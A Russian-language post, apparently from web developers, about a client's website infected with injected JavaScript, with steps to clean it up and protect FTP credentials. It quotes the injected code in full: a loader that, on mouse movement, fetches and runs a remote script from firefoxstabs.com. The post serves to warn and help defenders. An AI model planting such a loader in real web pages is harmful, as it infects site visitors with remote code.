На днях заметили, что у нашего клиента сайт подхватил какую-то заразу. В практически каждый файл сайта встроен следующий код:
document.write('
https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js">');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('
http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});
Проанализировав угрозу и пробежавшись по результатам поиска выяснили следующее ...
Скорее всего был подсажен експлоит или троян потенциальной жертве, слиты FTP доступы(например из TotalCommander) и дальше было только делом времени последующее заражение сайтов.
Пока искали информацию по данному кону, нашли уйму сайтов, так же зараженных. Самое интересное то, что если заходим на сайт клиента с рабочих компьютеров, то не успевает сайт прогрузиться, как идет редирект на Google. Если же смотрим из дому, то сайт открывается нормально, но скрипты сайта не функционируют ... Мистика, да и только.
Как удалить firefoxstabs.com ?
1. Обновить антивирус и проверить компьютеры всех, кто имеет доступы к сайту
2. Вылечить компьютеры
3. Скачать сайт с ФТП на безопасный компьютер
4. Руками пройтись по всем файлам и удалить данную мерзость
5. Залить сайт обратно
6. Сменить абсолютно все доступы к сайту
В противном случае все возродиться через пару суток.
Берегите свои сайты.
Спасибо.
P.S. Используйте антивирусы с актуальными базами и фаерволы. Не храните доступы к сайтам в файловых менеджерам. Поддерживайте актуальную версию операционной системы, файлового менеджера и антивирусного ПО. Только так Вы можете быть на 99% уверены, что Ваш сайт в целости и сохранности, работает 24 часа в сутки и приносит Вам прибыль.